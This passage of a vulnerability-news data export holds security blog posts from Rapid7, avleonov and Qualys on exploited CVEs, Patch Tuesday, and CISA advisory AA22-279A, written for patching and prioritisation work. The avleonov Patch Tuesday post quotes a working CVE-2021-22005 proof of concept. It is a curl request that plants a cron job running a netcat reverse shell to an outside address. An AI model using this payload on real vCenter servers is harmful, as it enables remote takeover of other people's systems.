[applications](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>), and [other](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) [popular](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>) [solutions](<https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/>), the threat actors definitely did not take it easy this summer. InsightVM and Nexpose customers can assess their exposure to many of these CVEs for vulnerability checks, including:\n\n * **Mitel MiVoice Connect Service Appliance | CVE-2022-29499:** An onsite VoIP business phone system, MiVoice Connect had a data validation vulnerability, which arose from insufficient data validation for a diagnostic script. The vulnerability potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>).\n * **\u201cQuestions\u201d add-on for Confluence Application | CVE-2022-26138:** This vulnerability affected \u201cQuestions,\u201d an add-on for the Confluence application. It was quickly exploited in the wild once the hardcoded password was released on social media. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).\n * **Multiple vulnerabilities in Zimbra Collaboration Suite:** Zimbra, a business productivity suite, was affected by five different vulnerabilities, one of which was unpatched, and four of which were being actively and widely exploited in the wild by well-organized threat actors. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>).\n * **CVE-2022-30333**\n * **CVE-2022-27924**\n * **CVE-2022-27925**\n * **CVE-2022-37042**\n * **CVE-2022-37393**\n\nWe were hard at work this summer making improvements and increasing the level of protections against attackers for our customers. As we head into the fall and the fourth quarter of the year, you can bet we will continue to make InsightVM the best and most comprehensive risk management platform available. Stay tuned for more great things, and have a happy autumn.\n\n_**Additional reading:**_\n\n * _[The 2022 SANS Top New Attacks and Threats Report Is In, and It's Required Reading](<https://www.rapid7.com/blog/post/2022/09/14/the-2022-sans-top-new-attacks-and-threats-report-is-in-and-its-required-reading/>)_\n * _[InsightVM: Best Practices to Improve Your Console](<https://www.rapid7.com/blog/post/2022/09/12/insightvm-best-practices-to-improve-your-console/>)_\n * _[5 Steps for Dealing With Unknown Environments in InsightVM](<https://www.rapid7.com/blog/post/2022/09/06/5-steps-for-dealing-with-unknown-environments-in-insightvm/>)_\n * _[What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)_[ \n](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-28T14:11:35", "type": "rapid7blog", "title": "What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005", "CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-36804", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-09-28T14:11:35", "id": "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "href": "https://blog.rapid7.com/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let's start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected there, but it didn't get there.\n\n## Autodiscover leak discovered by Guardicore Labs \n\n"Autodiscover, a protocol used by Microsoft Exchange for automatic configuration of clients such as Microsoft Outlook, has a design flaw that causes the protocol to \u201cleak\u201d web requests to Autodiscover domains outside of the user\u2019s domain but in the same TLD (i.e. Autodiscover.com)." [Guardicore Labs acquired multiple Autodiscover domains](<https://www.guardicore.com/labs/autodiscovering-the-great-leak/>) and have captured 372,072 Windows domain credentials in total. It seems Microsoft have chosen to ignore this issue. No CVE, no Outlook or ActiveSync patches. The only fix is to ban the "Autodiscover." domains on devices.\n\n## Microsoft Patch Tuesday for October 2021\n\n74 vulnerabilities: 1 Critical, 30 High, 43 Medium.\n\n### Elevation of Privilege - Windows Kernel (CVE-2021-40449)\n\nIt is a [use-after-free vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/>) in the NtGdiResetDC function of the Win32k driver. A detailed technical description is available in Kasperky [Securelist post](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>), but, in short, the vulnerability can lead to leakage of kernel module addresses in the computer\u2019s memory. This vulnerability is being exploited in the wild by APT MysterySnail. All servers and desktops should be updated.\n\n### Remote Code Execution - Microsoft Exchange Server (CVE-2021-26427)\n\nIt is necessary to update the Exchanges, but it's not very critical. "Despite the high CVSS score, the advisory does specifically point out that the vulnerability would only be exploitable from an adjacent network". There are no signs of exploitation or exploits yet. Three other vulnerabilities related to Exchange Server were also patched: CVE-2021-41350, a Spoofing vulnerability; CVE-2021-41348, allowing elevation of privilege; and CVE-2021-34453, which is a Denial of Service vulnerability.\n\n### Remote Code Execution - Windows DNS Server (CVE-2021-40469)\n\nDNS servers need to be updated, but real exploitation is unlikely. It was categorized as \u201cExploitation Less Likely.\u201d It received a CVSSv3 score of 7.2 because an attacker needs a privileged user account in order to exploit this across the network.\n\n### Remote Code Execution - Microsoft Word (CVE-2021-40486)\n\nThis is a good reason to check the Windows desktop updates. "This patch corrects a bug that would allow code execution when a specially crafted Word document is viewed on an affected system. Although Microsoft lists user interaction required, the Preview Pane is also listed as an attack vector." Also take a look at desktop vulnerability Spoofing - Windows Print Spooler (CVE-2021-36970), \u201cExploitation More Likely\u201d.\n\nAnd here you can get the whole [Vulristics report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_october2021_report_avleonov_comments.html>) for Microsoft Patch Tuesday October 2021.\n\n## Apache RCE with exploit (CVE-2021-41773)\n\nApache situation is like The Benny Hill Show. First, they released a new version (49) with a critical Path Traversal / RCE vulnerability CVE-2021-41773. Other versions were safe. Fortunately, this was revealed relatively quickly, in 2 weeks. The main stable distributions simply did not have time to add these packages to their repositories. Only fans of installing Apache from source and users of Slackware, Fedora and FreeBSD have suffered. And what was left for the victims to do? Obviously, hurry to roll the new safe version (50). But it turned out that the vulnerability in 50 was not completely fixed. And now the exploit [Apache HTTP Server 2.4.50 - Path / Traversal & Remote Code Execution (RCE)](<https://vulners.com/exploitdb/EDB-ID:50406>) is [publicly available](<https://t.me/avleonovnews/7619>). Repeat the exercise comrades in rolling now version 51. Everything will definitely be fine there. ![\ud83d\ude0f](https://s.w.org/images/core/emoji/13.1.0/72x72/1f60f.png) It's just a circus. ![\ud83e\udd26\ud83c\udffb\u200d\u2642\ufe0f](https://s.w.org/images/core/emoji/13.1.0/72x72/1f926-1f3fb-200d-2642-fe0f.png)\n\n## HAProxy RCE with exploit (CVE-2021-40346)\n\nA critical security vulnerability has [been disclosed in HAProxy](<https://thehackernews.com/2021/09/haproxy-found-vulnerable-to-critical.html>), a widely used open-source load balancer and proxy server, that could be abused by an adversary to possibly smuggle HTTP requests, resulting in unauthorized access to sensitive data and execution of arbitrary commands, effectively opening the door to an array of attacks. [A public POC](<https://github.com/donky16/CVE-2021-40346-POC>) has appeared for the vulnerability.\n\n## VMware vCenter arbitrary file upload with public exploit\n\n"[On September 21, 2021, VMware disclosed](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server. On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability".\n\n> CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. \n \ncurl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" <https://t.co/wi08brjl3r> [pic.twitter.com/bwjMA21ifA](<https://t.co/bwjMA21ifA>)\n> \n> -- wvu (@wvuuuuuuuuuuuuu) [September 27, 2021](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020?ref_src=twsrc%5Etfw>)\n\n## RCE exploits for Moodle\n\nSeveral RCE exploits for Moodle [were released on October 13](<https://t.me/avleonovnews/7605>). \n\n 1. [1337DAY-ID-36891](<https://vulners.com/zdt/1337DAY-ID-36891>) - Moodle Admin Shell Upload Exploit\n 2. [1337DAY-ID-36892](<https://vulners.com/zdt/1337DAY-ID-36892>) - Moodle SpellChecker Path Authenticated Remote Command Execution Exploit\n 3. [1337DAY-ID-36893](<https://vulners.com/zdt/1337DAY-ID-36893>) - Moodle Teacher Enrollment Privilege Escalation / Remote Code Execution Exploit\n 4. [1337DAY-ID-36894](<https://vulners.com/zdt/1337DAY-ID-36894>) - Moodle Authenticated Spelling Binary Remote Code Execution Exploit\n\n"Moodle is a free and open-source learning management system. it is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors". Surely some organizations make it available on the network perimeter and do not update it regularly.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:23:01", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday October 2021, Autodiscover, MysterySnail, Exchange, DNS, Apache, HAProxy, VMware vCenter, Moodle", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005", "CVE-2021-26427", "CVE-2021-34453", "CVE-2021-36970", "CVE-2021-40346", "CVE-2021-40449", "CVE-2021-40469", "CVE-2021-40486", "CVE-2021-41348", "CVE-2021-41350", "CVE-2021-41773"], "modified": "2021-10-21T00:23:01", "id": "AVLEONOV:99215B2D7808C46D8762AD712CD3D267", "href": "https://avleonov.com/2021/10/21/security-news-microsoft-patch-tuesday-october-2021-autodiscover-mysterysnail-exchange-dns-apache-haproxy-vmware-vcenter-moodle/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-23T15:50:43", "description": "Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, [Joint cybersecurity advisory (CSA) AA22-279A](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>), and how I analyzed these vulnerabilities using my open source project [Vulristics](<https://github.com/leonov-av/vulristics>). \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239105>\n\nAmericans can't just release a list of "20 vulnerabilities most commonly exploited in attacks on American organizations." They like to add geopolitics and point the finger at some country. Therefore, I leave the attack attribution mentioned in the advisory title without comment.\n\nBut I like such lists of vulnerabilities for a number of reasons:\n\n * Such lists of **vulnerabilities** show which CVEs need to be addressed. This is the most obvious. If you notice vulnerabilities from the list in your infrastructure, start fixing them as soon as possible.\n * Such lists of vulnerabilities show the **software and hardware products** that are most important to monitor. This means that your vulnerability scanner must support this software very well. Make sure you can verify this.\n * Such lists of vulnerabilities show **groups of software and hardware products **that need to be monitored first. Usually these are products that are available to a wide range of users and are inconvenient to upgrade.\n * Such lists of vulnerabilities show **the types of vulnerabilities** that you need to pay attention to first.\n * Such lists of vulnerabilities are relatively compact and **can be easily analyzed** even manually.\n\nI can't help but notice that the quality of the advisory is not very high. For example, the description of vulnerabilities was automatically taken from NVD. Including this: \n\n"Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078". \n\nNot very informative, right? This joint advisory was released by three big serious organizations. They could work harder and write a unique text for each of the 20 CVEs. But no one seems to care.\n\nHere is a list of all vulnerabilities from the advisory:\n\n 1. Apache Log4j CVE-2021-44228 Remote Code Execution\n 2. Pulse Connect Secure CVE-2019-11510 Arbitrary File Read\n 3. GitLab CE/EE CVE-2021-22205 Remote Code Execution\n 4. Atlassian CVE-2022-26134 Remote Code Execution\n 5. Microsoft Exchange CVE-2021-26855 Remote Code Execution\n 6. F5 Big-IP CVE-2020-5902 Remote Code Execution\n 7. VMware vCenter Server CVE-2021-22005 Arbitrary File Upload\n 8. Citrix ADC CVE-2019-19781 Path Traversal\n 9. Cisco Hyperflex CVE-2021-1497 Command Line Execution\n 10. Buffalo WSR CVE-2021-20090 Relative Path Traversal\n 11. Atlassian Confluence Server and Data Center CVE-2021-26084 Remote Code Execution\n 12. Hikvision Webserver CVE-2021-36260 Command Injection\n 13. Sitecore XP CVE-2021-42237 Remote Code Execution\n 14. F5 Big-IP CVE-2022-1388 Remote Code Execution\n 15. Apache CVE-2022-24112 Authentication Bypass by Spoofing\n 16. ZOHO CVE-2021-40539 Remote Code Execution\n 17. Microsoft CVE-2021-26857 Remote Code Execution\n 18. Microsoft CVE-2021-26858 Remote Code Execution\n 19. Microsoft CVE-2021-27065 Remote Code Execution\n 20. Apache HTTP Server CVE-2021-41773 Path Traversal\n\nOf course, I did not deny myself the pleasure of using this list of CVEs as input for my [Vulristics vulnerability prioritization tool](<https://github.com/leonov-av/vulristics>). Just to see how Vulristics handles it and tweak Vulristics if needed.\n\nHere is the command I used to generate the report:\n \n \n $ python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"AA22-279A\" --cve-list-path joint_cves.txt --cve-data-sources \"ms,nvd,vulners,attackerkb\" --cve-comments-path comments.txt --rewrite-flag \"True\"\n\nThe full report is here: <https://avleonov.com/vulristics_reports/aa22-279a_report_with_comments_ext_img.html>\n\n## Vulnerable Products\n\nIf you look at the list of vulnerable software and hardware products, then some of them, obviously, should have been included in this advisory. Because lately there have been a lot of publications about how attackers exploit the vulnerabilities in these products:\n\n * Apache HTTP Server\n * Apache Log4j2\n * GitLab\n * Microsoft Exchange\n * Confluence Server\n * Zoho ManageEngine ADSelfService Plus\n * Pulse Connect Secure\n\nThe second group of products. For them, there were also publications about attacks. But it seems that these are more niche products and are less perceived as targets for attackers:\n\n * BIG-IP\n * Citrix Application Delivery Controller\n * VMware vCenter\n * Cisco HyperFlex HX\n\nAnd finally, there are quite exotic products that apparently reflect the specifics of American IT:\n\n * Sitecore Experience Platform (XP)\n * Hikvision Web Server\n * Apache APISIX\n * Buffalo WSR\n\n## Criticality of Vulnerabilities\n\nVulristics has identified all vulnerabilities as vulnerabilities of the highest criticality level (Urgent). Vulristics found public exploits for all vulnerabilities.\n\nAt the same time, if you look at CVSS, then there is this:\n\nAll vulnerabilities: 20 \nCritical: 16 \nHigh: 4 \nMedium: 0 \nLow: 0\n\nSo if you are using CVSS for prioritization, don't forget about the High level vulnerabilities.\n\n## Detected Types of Vulnerabilities\n\n * Remote Code Execution\n * Command Injection\n * Arbitrary File Reading\n * Authentication Bypass\n * Path Traversal\n\nAs we can see, all vulnerabilities are obviously critical except for one "Path Traversal":\n\nPath Traversal - Citrix Application Delivery Controller (CVE-2019-19781)\n\nThe description of the vulnerability leaves no room for detecting another type:\n\n"An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal".\n\nThe same type is indicated in the advisory AA22-279A: Citrix ADC CVE-2019-19781 Path Traversal\n\nAnd only [in the description of the exploit](<https://github.com/trustedsec/cve-2019-19781>) we can see that this is in fact RCE: "This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for **remote code execution**."\n\nWell, this is another reminder to us that we should not do hard filtering by vulnerability type. It's also not a good idea to trust the description from NVD. The type of vulnerability may change over time, and no one will make changes to the description in NVD.\n\nIn some cases, Vulristics can help to more accurately determine the type of vulnerability:\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773)\n\nWhy? Because we can read in the description: "If CGI scripts are also enabled for these aliased pathes, this could allow for **remote code execution**."\n\nBut of course Vulristics is not a silver bullet. It is difficult to come up with something here other than manual analysis of publications about vulnerabilities and exploits.\n\nI also cannot help but point out that for some of the vulnerabilities, Vulrisitcs determined the types of vulnerabilities more correctly in accordance with the description:\n\nAA22-279A: GitLab CE/EE CVE-2021-22205 Remote Code Execution \nVulristics: Command Injection - GitLab (CVE-2021-22205) - Urgent [947] \n"\u2026 which resulted in a **remote command execution**."\n\nAA22-279A: Sitecore XP CVE-2021-42237 Remote Code Execution \nVulristics: Command Injection - Sitecore Experience Platform (XP) (CVE-2021-42237) \n"\u2026 it is possible to achieve **remote command execution** on the machine."\n\nAA22-279A: VMware vCenter Server CVE-2021-22005 Arbitrary File Upload \nVulristics: Remote Code Execution - VMware vCenter (CVE-2021-22005) \n"\u2026may exploit this issue **to execute code** on vCenter Server by uploading a specially crafted file."\n\nAA22-279A: F5 Big-IP CVE-2022-1388 Remote Code Execution \nVulristics: Authentication Bypass - BIG-IP (CVE-2022-1388) \n\u2026 undisclosed requests **may bypass** iControl REST **authentication**"\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773) \n"\u2026 this could allow for **remote code execution**."\n\nAA22-279A: Apache CVE-2022-24112 Authentication Bypass by Spoofing \nVulristics: Remote Code Execution - Apache APISIX (CVE-2022-24112) \n"\u2026 is vulnerable to **remote code execution**."\n\nAA22-279A: Buffalo WSR CVE-2021-20090 Relative Path Traversal \nVulristics: Authentication Bypass - Buffalo WSR (CVE-2021-20090) \n"\u2026 allow unauthenticated remote attackers to **bypass authentication**."\n\nTherefore, do not rush to trust the vulnerability type from the [CISA Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and take it into account when prioritizing vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T20:10:13", "type": "avleonov", "title": "Joint Advisory AA22-279A and Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-21T20:10:13", "id": "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246", "href": "https://avleonov.com/2022/10/21/joint-advisory-aa22-279a-and-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the Chinese government\u2014officially known as the People\u2019s Republic of China (PRC) states-sponsored cyber actors' activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People's Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC malicious actor continues to exploit known vulnerabilities to target U.S. and vigorously allied networks and software and hardware companies to rob intellectual property and develop access to sensitive networks. \n\nThey stated that PRC state-sponsored cyber activities as one of the most significant and dynamic threats to U.S. government and civilian networks. The PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to Information Technology Sector, telecommunications organizations, Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor**| **CVE**| **Vulnerability Type**| Qualys **QID**(s) \n---|---|---|--- \n| | | \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. Multiple CVEs indicated in Table 1 let the actors stealthily acquire unauthorized access into sensitive networks, after which they pursue to develop persistence and reposition laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised significant telecom establishments and network service providers mostly by exploiting publicly known vulnerabilities. Networks affected have varied from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. The devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as means to conduct network intrusions on other entities. Furthermore, cyber defenders often overlook these devices, who work to maintain and keep pace with frequent software patching of Internet-facing services and endpoint devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Vulnerabilities-Tab-1070x602.png)\n\nUsing, [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using the [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Prioritization-1070x602.png)\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability. \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Threat-Protection-1070x660.png)\n\nUsing the Qualys Unified Dashboard, you can track, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/NSA-TOP-CVES-1070x1215.jpg)\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored threat cyber actors. \n\nHere is a summary of mitigations guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, as listed in this article and the list provided by [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Utilize phishing-resistant multi-factor authentication and require all accounts with a unique and strong password. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest methods that organizations of all sizes could stay on top of these vulnerabilities and end-of-life (EOL) network/device infrastructure as noted by NSA general mitigations guidelines is to catalog the infected assets and apply patches as soon as possible. This could be an effortless process if the corps utilize the power of Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting, and patching the high-priority commonly exploited vulnerabilities. \n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": 